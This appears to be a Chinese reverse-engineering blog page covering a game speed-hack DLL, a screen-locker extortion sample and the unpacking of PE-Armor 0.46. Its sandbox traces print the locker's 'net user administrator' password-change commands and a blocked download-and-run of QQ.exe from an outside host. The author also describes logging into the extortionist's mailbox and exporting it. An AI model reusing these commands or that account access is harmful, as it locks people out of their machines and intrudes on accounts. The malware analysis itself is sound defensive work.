分析
分析

变速齿轮原理

实现DLL(内存中)
进程模块=C:\Users\Administrator\Desktop\变速齿轮0.46\GearNtKe.dll base address= 0x10000000 base size=143360
具体Hook的函数

1.png
2.png
3.png
4.png
5.png

结构图

变速齿轮 (2).png

挖掘敲竹杠里的邮箱

今天在帮吧友分析敲竹杠的时候发现一个很有意思的敲竹杠。
地址
链接: http://pan.baidu.com/s/1pJNtK75 密码: tvaq
分析

QQ截图20150314192049.png
可以看到上面的内容分析出了密码。但是后来发现这个密码是可变的。于是用OD分析了一下。发现其中是用邮箱来发送敲竹杠密码的。

进一步分析

QQ图片20150314202807.png
可以看到出现了一个邮箱账号跟密码。于是我登陆了一下,发现了一片新大陆。

新大陆

QQ图片20150314202905.png
这个是已发送邮箱的记录。还是比较多的。里面就是敲竹杠的密码。
于是全部导出来了。顺便做了个读取eml的工具,这样方便一点。因为163导出的格式只有EML。

导出

QQ截图20150314203044.png

打包下载

[打包]敲竹杠.rar

敲竹杠分析

由于敲竹杠分析起来比较简单,所以直接用分析工具进行分析查看密码了。分为两种情况第一种联网,第二种不联网。于是有了下面的内容:

QQ截图20150307151816.png

联网
   调试线程已开启...

MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:如:想知道密码请联系2925827435 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:如:想知道密码请联系2925827435 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004613a3] 设置窗体[禁止]: 文本:如:想知道密码请联系2925827435 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:10010 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:10010 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004613a3] 设置窗体[禁止]: 文本:10010 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:http:// 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:http:// 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004613a3] 设置窗体[禁止]: 文本:http:// 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:com 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:com 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004613a3] 设置窗体[禁止]: 文本:com 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:/1/zhanghao.htm 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:/1/zhanghao.htm 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004613a3] 设置窗体[禁止]: 文本:/1/zhanghao.htm 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:/1/mima.htm 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:/1/mima.htm 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004613a3] 设置窗体[禁止]: 文本:/1/mima.htm 类:Edit 【放行】
MessageBox ----- : [调用地址:0x00411661] 设置窗体[禁止]: 文本:密码 类:Afx:400000:b:10011:1900015:0 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/1.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/1.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/1.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/2.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/2.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/2.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/3.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/3.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/3.htm 【放行】
MessageBox ----- : [调用地址:0x004024ad] 运行命令:net user Administrator /fullname:想知道密码请联系QQ843379988 【放行】
MessageBox ----- : [调用地址:0x004024ad] 运行命令:net user administrator qaz843379988 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/xiazai.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/xiazai.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/xiazai.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/mubiao.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/mubiao.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/mubiao.htm 【放行】
MessageBox ----- : 打开网址:http://scq.daohaowang.com/QQ.exe 【阻止】
MessageBox ----- : 创建文件:C:\QQ.exe 【阻止】
MessageBox ----- : [调用地址:0x004024ad] 运行命令:C:\QQ.exe 【阻止】
MessageBox ----- : 重启系统:已禁止 --- 默认终止程序 【阻止】
MessageBox ----- : END

调试线程已关闭...

不联网

调试线程已开启...


MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:如:想知道密码请联系2925827435 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:如:想知道密码请联系2925827435 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004613a3] 设置窗体[禁止]: 文本:如:想知道密码请联系2925827435 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:10010 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:10010 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004613a3] 设置窗体[禁止]: 文本:10010 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:http:// 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:http:// 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004613a3] 设置窗体[禁止]: 文本:http:// 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:com 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:com 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004613a3] 设置窗体[禁止]: 文本:com 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:/1/zhanghao.htm 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:/1/zhanghao.htm 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004613a3] 设置窗体[禁止]: 文本:/1/zhanghao.htm 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:/1/mima.htm 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:/1/mima.htm 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004613a3] 设置窗体[禁止]: 文本:/1/mima.htm 类:Edit 【放行】
MessageBox ----- : [调用地址:0x00411661] 设置窗体[禁止]: 文本:密码 类:Afx:400000:b:10011:1900015:0 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/1.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/1.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/1.htm 【放行】
MessageBox ----- : [调用地址:0x004024ad] 运行命令:net user Administrator /fullname:如:想知道密码请联系2925827435 【放行】
MessageBox ----- : [调用地址:0x004024ad] 运行命令:net user administrator 10010 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/xiazai.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/xiazai.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/xiazai.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/mubiao.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/mubiao.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/mubiao.htm 【放行】
MessageBox ----- : 重启系统:已禁止 --- 默认终止程序 【阻止】
MessageBox ----- : END

调试线程已关闭...

动态密码读取地址
http://jm.20rj.com/1/3.htm

脱一下PE-Armor 0.46

加壳对比:

这个版本是看雪加解密第三版源码里的程序。直接可以编译,然后找了个程序加了一下壳。

搜狗截图20150301235525.png
可以看到加壳后程序的体积明显变小了工程1-副本是加壳后,为什么会变小了呢。实际是使用了aplib压缩引擎,这里我将程序的压缩引擎修改为最新的了。所以可能大家自己操作的时候压缩比率可能不是太一样。

入口点对比:

看完加壳的效果以后我们看一下加壳后的入口点是否有变化。

壳前后.png
可以看到加壳后的入口点跟加壳前的入口点是不一样的,这里主要是自行一些自解压与输入表还原的操作,然后直接一个retn返回到原入口点。
返回原入口点代码:
yy'.png

阅读全文»